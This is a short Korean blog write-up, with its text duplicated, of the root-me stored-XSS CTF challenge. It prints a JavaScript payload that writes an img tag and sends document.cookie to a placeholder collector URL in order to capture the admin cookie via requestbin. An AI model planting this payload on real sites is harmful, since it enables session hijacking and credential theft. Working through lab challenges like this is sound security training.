[root-me]XSS-stored 1
크로스 사이트 스크립트 문제.
admin의 쿠키 값을 받아야 한다.
아파치 서버를 이용해서 할 수도 있을 것 같은데,
간단하게 requestbin을 이용했다.
사용한 스크립트는
스크립트
document.write("<img src='http://당신의URL?="+document.cookie+"'></img>");
/스크립트
인데,
img경로에 admin으로부터 데이터를 입력받을 URL을 src속성을 이용해서 지정해줬다.
이 부분에 아파치 서버 주소를 입력해줘도 똑같이 풀 수 있을 듯.
img 경로로 스크립트를 짰기 때문에 send message를 하면 사진 파일이 올라간 것처럼 보이게 된다.
requestbin에서 만들어놓은 URL로 접속하면 왼쪽 상단에 ADMIN_COOKIE를 받아온 것을 확인할 수 있다. 연결 문제 탓에 한 번에 성공하지는 않았는데, 될 때까지 계속 하다보면 된다.
admin의 쿠키 값을 받아야 한다.
아파치 서버를 이용해서 할 수도 있을 것 같은데,
간단하게 requestbin을 이용했다.
사용한 스크립트는
스크립트
document.write("<img src='http://당신의URL?="+document.cookie+"'></img>");
/스크립트
인데,
img경로에 admin으로부터 데이터를 입력받을 URL을 src속성을 이용해서 지정해줬다.
이 부분에 아파치 서버 주소를 입력해줘도 똑같이 풀 수 있을 듯.
img 경로로 스크립트를 짰기 때문에 send message를 하면 사진 파일이 올라간 것처럼 보이게 된다.
requestbin에서 만들어놓은 URL로 접속하면 왼쪽 상단에 ADMIN_COOKIE를 받아온 것을 확인할 수 있다. 연결 문제 탓에 한 번에 성공하지는 않았는데, 될 때까지 계속 하다보면 된다.
댓글
댓글 쓰기